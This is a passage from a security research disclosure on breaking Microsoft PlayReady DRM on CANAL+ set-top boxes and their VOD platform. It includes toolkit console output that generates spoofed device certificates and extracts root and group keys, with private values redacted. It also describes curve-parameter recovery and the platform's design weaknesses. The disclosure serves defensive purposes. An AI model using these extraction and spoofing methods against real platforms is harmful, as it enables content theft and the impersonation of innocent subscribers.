73 4d 76 ...@..&._..L.sMv 0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 ....{I,....Q.oTX 0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd l.....l.)..tu... 0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 .d.i.....f...... 0040: 70 df ca 0d p... attr: 000b Signature data 0000: 00 01 00 10 48 f1 2b cd 5c b9 47 c4 a9 2b 8b b8 ....H.+...G..+.. 0010: 2f c7 dd 83 /... content_key 0000: *REMOVED* ``` It is worth to mention that for each code run, new crypto values are generated too: ``` c:\_TRANSFER\MSPRNCP\toolkit>shell # MS Play Ready / Canal+ VOD toolkit # (c) Security Explorations 2016-2019 Poland # (c) AG Security Research 2019-2022 Poland loaded cdn [CDN helper] loaded mspr [MS Play Ready toolkit] loaded vod [CANALP VOD toolkit] loaded cgaweb [CANALP CGAWeb toolkit] msprcp> devcert generating new cert, device changed or not initialized ### CERT - random 0000: e2 10 76 85 6e 63 b9 09 f7 a1 26 68 14 48 66 1e ..v.nc....&h.Hf. - seclevel 2000 - uniqueid 0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38 ,$..C..30A4072D8 - pubkey_sign 0000: 3c 6a 53 7d 10 29 d4 05 98 33 33 3e 5f 89 2e 76 _..v 0010: c0 bb 64 56 6d c4 af 72 91 87 98 50 c6 08 d7 df ..dVm..r...P.... 0020: 74 29 45 2c 23 e5 bb 7d b1 83 cd 71 4a ae f6 99 t)E,#..}...qJ... 0030: 59 9d a5 d6 98 f4 e4 c6 79 ee 90 35 73 39 08 d8 Y.......y..5s9.. - pubkey_enc 0000: 8c f6 5a 18 44 2f 21 54 84 d7 32 f8 fe e1 70 7e ..Z.D/!T..2...p. 0010: 2e d2 99 bf 5b bd 95 d7 68 bb 9d 89 e4 04 ae f4 ....[...h....... 0020: de be 27 d4 be 5d ae a9 f1 83 ad 4e 1d ea 18 fd ..'..].....N.... 0030: 45 49 7f ee 1a 96 d1 c5 47 3a bf ac 21 c2 5b dc EI......G:..!.[. - digest 0000: 89 54 83 48 13 3b 36 68 07 5a 74 0d 45 a0 46 3b .T.H.;6h.Zt.E.F; 0010: 8b 0f e7 37 e6 f7 e6 42 99 4a 3b a2 11 0b 89 9f ...7...B.J;..... - signkey 0000: ae 51 7c 73 44 23 eb 9b 5b 06 3d 5c 3a 20 63 60 .Q|sD#..[.=.:.c. 0010: cf 93 b3 8a a0 52 b7 3c c7 22 cf 9b 54 ab 0d 58 .....R.<."..T..X 0020: 2e b5 56 fa c8 ed 83 28 8f 3b 91 4d 85 2d 29 1c ..V....(.;.M.-). 0030: f2 34 1b f4 ae d8 21 57 64 8b 64 ab 27 69 85 62 .4....!Wd.d.'i.b msprcp> exit c:\_TRANSFER\MSPRNCP\toolkit>shell # MS Play Ready / Canal+ VOD toolkit # (c) Security Explorations 2016-2019 Poland # (c) AG Security Research 2019-2022 Poland loaded cdn [CDN helper] loaded mspr [MS Play Ready toolkit] loaded vod [CANALP VOD toolkit] loaded cgaweb [CANALP CGAWeb toolkit] msprcp> devcert generating new cert, device changed or not initialized ### CERT - random 0000: eb e5 32 60 06 21 89 1b a0 a3 93 52 f6 e7 12 e2 ..2..!.....R.... - seclevel 2000 - uniqueid 0000: 2c 24 1b 10 43 99 e0 33 30 41 34 30 37 32 44 38 ,$..C..30A4072D8 - pubkey_sign 0000: f2 03 7f 05 3b 7e 24 94 2b 50 02 4f 92 20 17 33 ....;.$.+P.O...3 0010: 15 3c 23 70 1e aa fe 27 95 38 0a f4 03 e8 91 ba .<#p...'.8...... 0020: b5 73 44 3f 4d 52 42 e8 e6 cd 91 65 c2 1c d5 a7 .sD?MRB....e.... 0030: b7 34 5a aa 1c 6f 63 31 ce 97 35 8a 10 c2 47 7d .4Z..oc1..5...G} - pubkey_enc 0000: 0f 89 99 cd b3 4f 0d 89 b1 bd d2 47 13 b1 31 1d .....O.....G..1. 0010: 3d 08 32 9c e1 83 85 25 ff 7b be 6e 1c 3b 8e ce =.2....%.{.n.;.. 0020: c1 72 64 d0 b7 f8 78 0c 7c d2 0a 37 9f ec 14 2d .rd...x.|..7...- 0030: a2 b4 33 da 2a a5 ff 54 e8 ee b6 c7 c5 db 0b 3a ..3.*..T.......: - digest 0000: d7 d0 01 8d 2d 83 6d 48 12 7d 79 4c 15 e6 68 5c ....-.mH.}yL..h. 0010: ab 65 61 30 b5 dc 68 e5 f5 71 f7 41 6f d8 99 23 .ea0..h..q.Ao..# - signkey 0000: ae 51 7c 73 44 23 eb 9b 5b 06 3d 5c 3a 20 63 60 .Q|sD#..[.=.:.c. 0010: cf 93 b3 8a a0 52 b7 3c c7 22 cf 9b 54 ab 0d 58 .....R.<."..T..X 0020: 2e b5 56 fa c8 ed 83 28 8f 3b 91 4d 85 2d 29 1c ..V....(.;.M.-). 0030: f2 34 1b f4 ae d8 21 57 64 8b 64 ab 27 69 85 62 .4....!Wd.d.'i.b msprcp> ``` The above along `SERIAL` and `MAC` value change can make attribution hard. ## SOME THOUGHTS Below, some thoughts are given on the topics that triggered my attention over the course of this research. ### REAL CDN URLs VOD platform should not reveal URLs of content. The URLs should be generated at random by the license server (and be valid for a limited time period) and returned to the requesting entity only if the license to content was granted. In Microsoft PlayReady case, the license is acquired for the KID, not the URL. The license request embeds the WRM header that carries proper information on that. This behavior is likely due to the fact that CDN is not synced with license server or that PlayReady doesn't care about content as its work is limited to key identifiers (KIDs). There is no reason to reveal the actual URL for content. This work is a good demonstration of the risk associated with content URL leaks as: 1) the attacker can copy DB of content (understood as links to manifest files), 2) the attacker can issue license requests for KIDs associated with harvested manifest files in order to obtain plaintext content keys 3) the attacker can begin download fragments from CDN network. IMHO access to content keys and CDN URLs should be treated in the same way. There are two pieces of the puzzle. Access to content key should implicate the ability to download and decrypt content. Giving access to download content gives the advantage to the attacker. I see the potential (and risks) associated with the following: - whole CDN content gets downloaded (without keys, the download could be performed in a distributed manner, by the group of attackers located in different geographical regions), - the attacker(s) now just needs the keys to "unlock" the content (few less data). ### DIFFICULT ATTRIBUTION MS PlayReady certificate is generated in a dynamic manner for client device with the use of a group cert (common for same device models). This implicates the risk of secrets theft (PlayReady group cert and key) from one device only. This also implicated no knowledge of the subscriber that makes use of the stolen secrets and that relies on a fake identity for malicious purposes. This makes attribution harder too as the attacker can easily spoof the identity of other innocent users (STB serial and MAC sufficient for that - these data can be acquired from a store, where CANAL+ STBs are sold). In that content, PlayReady certificate should be tied to the HW secret. All CANAL+ set-top-boxes contain the functionality to pair the STB with a smart card. The pairing relies on a HW secret (SCK key for ST chipset bases devices). The very same SCK key should be used for client device certificate generation for the purpose of: - verifying the device identity at the time of license request (response to the challenge, or HMAC in the cert), - tracking clients that request license in an unusual manner (from different IP addresses, too many license requests for a given time period). The device certificate pairing could be completed with the use of a HMAC (AES CBC relying on a unique chip secret key). Finally it's worth to mention that attribution gets especially harder when vulnerabilities are present in target STB devices. This is the case for CANAL+ boxes (3 years old bugs). ### NO TIME LIMITED CERT It worth to mention that there is no time (certificate validity time) attr in device cert. This implicates their validity for the time of a signing cert (until signing group cert is revoked / changed). ### DENIAL OF SERVICE ATTACK (DOS) DOS attack against license server is likely sufficient to nuke the VOD platform. If license server is unavailable, most of the content cannot be played. ### LITTLE REVERSE ENGINEERING OBSTACLES Reversing MS Play Ready could be successfully performed as: - multiple symbol names were left in a binary, - the binary didn't contain any reverse engineering countermeasures such as code obfuscation, etc. MS PlayReady functionality was implemented at the application layer too. This implicated no need to break security of the kernel or HW chip (which could be done btw.). While the private group key and group certificates were embedded in the binary in encrypted form, their plaintext content could be retrieved in runtime with the help of user level api too (access to encrypted file system). The ECC curve parameters were embedded in a binary in a nn-standard way (affine transformation to MOD space). All calculations were conducted with respect to that transformation too (and with certain optimizations such as Montgomery ladder). Yet, this hasn't been an obstacle as long as fundamentals of ECC cryptography were acquired. The crucial weak point was the P256 symbol and subroutine verifying whether a given point is on curve. This subroutine indirectly leaked curve params (and type). The ECC formula for NIST P-256 curve is the following: Y^2 = X^3 + A*x + B This formula can be used to check whether a given point (X,Y) lies on ECC curve. For points transformed to the MOD space Y = y*F X = x*F This yields the following: (y*F)^2 = (x*F)^3 + A*x + B y^2 * F^2 = x ^3 * F^3 + A*x + B // multiplying by the F^-1 (inverse) y^2 * F^2 * F^-1 = x ^3 * F^3 * F^-1 + A*x*F^-1 + B*F^-1 y^2 * F^2 * F^-1 = x ^3 * F^3 * F^-1 + (A*F^-1)*x + B*F^-1 which yields the curve params used for points transformed to MOD space: real_a=(A*F^-1) real_b=B*F^-1 The above was verified with the use of a code from `reversing\curve_params` directory: ``` p: ffffffff00000001000000000000000000000000ffffffffffffffffffffffff a: fffffffc00000004000000000000000000000003fffffffffffffffffffffffc b: dc30061d04874834e5a220abf7212ed6acf005cd78843090d89cdf6229c4bddf x: c8b6af16ee941aadaa5389b4af2c10e356be42af175ef3face93254e7b0b3d9b y: 982b27b5cb2341326e56aa857dbfd5c634ce2cf9ea74fca8f2af5957efeea562 X to_point: d9279a1bdded5008c68c131bba13693a3d31ed60c7ee32fd527b4ecaacc6af7 Y to_point: ad1672971d78becdebdbd582c62bebc858a989944d9e16348dbf6cccf6961043 x_pow_2: c5b95a01aa4050357c63f9fdb5d4a90fc4fe0a1e0d5f2ceace9e0292973e2466 x_pow_2_plus_a: c5b959feaa4050387c63f9fdb5d4a90fc4fe0a210d5f2ceace9e0292973e246 x_pow_3_plus_ax: adc225c0905f9b67beda4c215af7abe97b4c373975655b44beb446b349a9cf 8 x_pow_3_plus_ax_plus_b: 89f22bde94e6e39ba47c6ccd5218dac0283c3d05ede98bd59751261 736e8dc8 y_pow_2: 89f22bde94e6e39ba47c6ccd5218dac0283c3d05ede98bd597512615736e8dc8 ecaffine_on_curve: true real_a_bi: ffffffff00000001000000000000000000000000fffffffffffffffffffffffc real_b_bi: 5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b real_genx_bi: 6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296 real_geny_bi: 4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5 ``` The `real` variables are the ones used by the P-256 curve. The other ones are those used by the MS Play Ready binary (with affine MOD transformation taken into account). ### THE IMPORTANCE OF SECURE DEVICES (AND PROMPT PATCHING) The presented case demonstrates the implication of a one compromised (unpatched by the vendor) device can make to the security of the whole platform One such device can pose a significant security risk from a content security point of view. ### THE IMPACT OF A COMPROMISED DEVICE ROOT KEY Compromised device root key along MS PlayReady binary used by that device are sufficient to extract all PlayReady key data required to impersonate client identity. This is illustrated below: ``` msprcp> extractsecrets mspr_binary\libstd_cai_client_drm_msplayready.so ROOT DEVICE KEY PRV mod: *REMOVED* exp: *REMOVED* PUB mod: c420ffde51d23a1e067787861f013ad739e5a90bc77b128fd4366c0609c56b168905646 d3c4eeace4a62766b5fe6bf7344d7338ddf30bd0a17869756107121a2cf616e4a24275d6e71476e0 47fffb4f412c869a537026cdd09c4437c1bf0f8a8f93abd62da0c8d0e8ed6c416e03a4cb343f8d3d 0987c84f1dfb2a2641a845d28d81df033c86b147915e77cc37b8ad6f4bc647c41934d7f4527a0420 de6bd6921e58179cc0dd8b49a7ead91f83dd959d6e2e45731674aba92c63ea0510fb749e55755a5a fe0b259268a6826c4e1c947808df28ef907664010a4072ca935819572e63f4905b49a6cc3cf25b4f c078b4c38a10ba86bf68b20b0eee1a48b52972ae9 exp: 10001 - decrypting keys image (K1) K1 0000: *REMOVED* - decrypting template certificate (T1) T1 0000: 30 30 30 30 30 66 61 63 ff fe 3c 00 44 00 45 00 00000fac..<.D.E. 0010: 56 00 43 00 45 00 52 00 54 00 20 00 76 00 65 00 V.C.E.R.T...v.e. 0020: 72 00 73 00 69 00 6f 00 6e 00 3d 00 22 00 31 00 r.s.i.o.n.=.".1. 0030: 2e 00 30 00 22 00 3e 00 3c 00 43 00 45 00 52 00 ..0.".>.<.C.E.R. 0040: 54 00 49 00 46 00 49 00 43 00 41 00 54 00 45 00 T.I.F.I.C.A.T.E. 0050: 20 00 74 00 79 00 70 00 65 00 3d 00 22 00 44 00 ..t.y.p.e.=.".D. 0060: 45 00 56 00 49 00 43 00 45 00 22 00 3e 00 3c 00 E.V.I.C.E.".>.<. 0070: 44 00 41 00 54 00 41 00 3e 00 3c 00 55 00 4e 00 D.A.T.A.>.<.U.N. 0080: 49 00 51 00 55 00 45 00 49 00 44 00 20 00 70 00 I.Q.U.E.I.D...p. 0090: 72 00 69 00 76 00 61 00 74 00 65 00 3d 00 22 00 r.i.v.a.t.e.=.". 00a0: 31 00 22 00 3e 00 3c 00 2f 00 55 00 4e 00 49 00 1.".>.<./.U.N.I. 00b0: 51 00 55 00 45 00 49 00 44 00 3e 00 3c 00 50 00 Q.U.E.I.D.>.<.P. 00c0: 55 00 42 00 4c 00 49 00 43 00 4b 00 45 00 59 00 U.B.L.I.C.K.E.Y. 00d0: 20 00 70 00 72 00 69 00 76 00 61 00 74 00 65 00 ..p.r.i.v.a.t.e. 00e0: 3d 00 22 00 31 00 22 00 3e 00 3c 00 2f 00 50 00 =.".1.".>.<./.P. 00f0: 55 00 42 00 4c 00 49 00 43 00 4b 00 45 00 59 00 U.B.L.I.C.K.E.Y. 0100: 3e 00 3c 00 4b 00 45 00 59 00 44 00 41 00 54 00 >.<.K.E.Y.D.A.T. 0110: 41 00 3e 00 3c 00 2f 00 4b 00 45 00 59 00 44 00 A.>.<./.K.E.Y.D. 0120: 41 00 54 00 41 00 3e 00 3c 00 2f 00 44 00 41 00 A.T.A.>.<./.D.A. 0130: 54 00 41 00 3e 00 3c 00 4d 00 53 00 44 00 52 00 T.A.>.<.M.S.D.R. 0140: 4d 00 5f 00 53 00 49 00 47 00 4e 00 41 00 54 00 M._.S.I.G.N.A.T. 0150: 55 00 52 00 45 00 5f 00 56 00 41 00 4c 00 55 00 U.R.E._.V.A.L.U. 0160: 45 00 3e 00 3c 00 2f 00 4d 00 53 00 44 00 52 00 E.>.<./.M.S.D.R. 0170: 4d 00 5f 00 53 00 49 00 47 00 4e 00 41 00 54 00 M._.S.I.G.N.A.T. ... 0f30: 44 00 63 00 45 00 69 00 6e 00 39 00 78 00 6a 00 D.c.E.i.n.9.x.j. 0f40: 6f 00 79 00 65 00 51 00 3d 00 3d 00 3c 00 2f 00 o.y.e.Q.=.=.<./. 0f50: 4d 00 53 00 44 00 52 00 4d 00 5f 00 53 00 49 00 M.S.D.R.M._.S.I. 0f60: 47 00 4e 00 41 00 54 00 55 00 52 00 45 00 5f 00 G.N.A.T.U.R.E._. 0f70: 56 00 41 00 4c 00 55 00 45 00 3e 00 3c 00 2f 00 V.A.L.U.E.>.<./. 0f80: 43 00 45 00 52 00 54 00 49 00 46 00 49 00 43 00 C.E.R.T.I.F.I.C. 0f90: 41 00 54 00 45 00 3e 00 3c 00 2f 00 44 00 45 00 A.T.E.>.<./.D.E. 0fa0: 56 00 43 00 45 00 52 00 54 00 3e 00 00 00 00 00 V.C.E.R.T.>..... 0fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0fc0: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................ - decrypting binary group certificate (G1) G1 0000: 30 30 30 30 30 36 37 34 43 48 41 49 00 00 00 01 00000674CHAI.... 0010: 00 00 06 6c 00 00 00 00 00 00 00 03 43 45 52 54 ...l........CERT 0020: 00 00 00 01 00 00 01 b8 00 00 01 28 00 01 00 01 ...........(.... 0030: 00 00 00 58 8c d9 41 78 62 d9 cf 0f 25 f8 55 ab ...X..Axb...%.U. 0040: e1 35 80 63 00 00 07 d0 00 00 00 00 00 00 00 04 .5.c............ 0050: 10 4f ba 64 a3 77 f4 3c 94 bc 25 b2 cf 42 7c a3 .O.d.w.<..%..B|. 0060: e7 4f a2 c1 97 02 72 cf 4e e5 78 41 59 de 8f ab .O....r.N.xAY... 0070: ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0080: 00 00 00 00 00 01 00 05 00 00 00 10 00 00 00 01 ................ 0090: 00 00 00 04 00 01 00 06 00 00 00 60 00 00 00 01 ................ 00a0: 00 01 02 00 00 00 00 00 ae 51 7c 73 44 23 eb 9b .........Q|sD#.. 00b0: 5b 06 3d 5c 3a 20 63 60 cf 93 b3 8a a0 52 b7 3c [.=.:.c......R.< 00c0: c7 22 cf 9b 54 ab 0d 58 2e b5 56 fa c8 ed 83 28 ."..T..X..V....( 00d0: 8f 3b 91 4d 85 2d 29 1c f2 34 1b f4 ae d8 21 57 .;.M.-)..4....!W 00e0: 64 8b 64 ab 27 69 85 62 00 00 00 02 00 00 00 01 d.d.'i.b........ 00f0: 00 00 00 06 00 00 00 07 00 00 00 50 00 00 00 00 ...........P.... 0100: 00 00 00 20 41 64 76 61 6e 63 65 64 20 44 69 67 ....Advanced.Dig 0110: 69 74 61 6c 20 42 72 6f 61 64 63 61 73 74 20 53 ital.Broadcast.S 0120: 2e 41 2e 00 00 00 00 0a 49 54 49 2d 32 38 35 31 .A......ITI-2851 0130: 53 00 00 00 00 00 00 0a 49 54 49 2d 32 38 35 31 S.......ITI-2851 0140: 53 00 00 00 00 01 00 08 00 00 00 90 00 01 00 40 S..............@ 0150: 04 df b1 9b 28 1f b5 17 42 4e 63 e8 88 57 f5 70 ....(...BNc..W.p 0160: 27 8e 95 e7 98 f0 40 ae e0 08 2b 84 da 58 e7 f7 '.....@...+..X.. 0170: 58 93 92 59 01 df d2 74 97 56 51 15 44 f7 4b 49 X..Y...t.VQ.D.KI ... 04e0: 50 6c 61 79 52 65 61 64 79 20 53 4c 32 30 30 30 PlayReady.SL2000 04f0: 20 44 65 76 69 63 65 20 2b 20 4c 69 6e 6b 20 52 .Device.+.Link.R 0500: 6f 6f 74 20 43 41 00 00 00 00 00 00 00 00 00 00 oot.CA.......... 0510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0560: 00 00 00 80 31 2e 30 2e 30 2e 31 00 00 00 00 00 ....1.0.0.1..... 0570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 05a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 05b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 05c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 05d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 05e0: 00 00 00 00 00 01 00 08 00 00 00 90 00 01 00 40 ...............@ 05f0: e9 eb 63 e5 f1 ba 51 cd 37 c0 bd 4e 2e 63 95 0b ..c...Q.7..N.c.. 0600: 2e 20 10 4a fe b9 95 a9 7d eb d3 4c 46 28 76 73 ...J....}..LF(vs 0610: b3 9c eb e7 5d 9a 76 4b d2 05 5a 87 75 56 1f c1 ....].vK..Z.uV.. 0620: fe 4e 72 91 da 44 57 98 ad ca e5 40 0f 71 15 2e .Nr..DW....@.q.. 0630: 00 00 02 00 86 4d 61 cf f2 25 6e 42 2c 56 8b 3c .....Ma..%nB,V.< 0640: 28 00 1c fb 3e 15 27 65 85 84 ba 05 21 b7 9b 18 (...>.'e....!... 0650: 28 d9 36 de 1d 82 6a 8f c3 e6 e7 fa 7a 90 d5 ca (.6...j.....z... 0660: 29 46 f1 f6 4a 2e fb 9f 5d cf fe 7e 43 4e b4 42 )F..J...]...CN.B 0670: 93 fa c5 ab 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0680: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ................ - decrypting private ECC group key (Z1) Z1 0000: *REMOVED* msprcp> ``` It is worth to mention that CANAL+ STB boxes might share root keys across different models or the keys get changed at SW upgrade time. This could not be verified though as only access to 1 compromised STB model with PlayReady functionality was obtained. Finally, some additional attack ideas haven't been verified in practice. ### MS PLAY READY SPECIFIC CODE OF STB EXPLOIT The code for `Drm` class implements`test adbdecrypt` command, which illustrates the way the root key could be read from a compromised STB. This class also implements the functionality for the "reinitializtion" of MS Play Ready client identity (`test reinit` command). `MSPRHandler` class illustrates the dynamic tracing functionality used when reverse engineering PlayReady operation.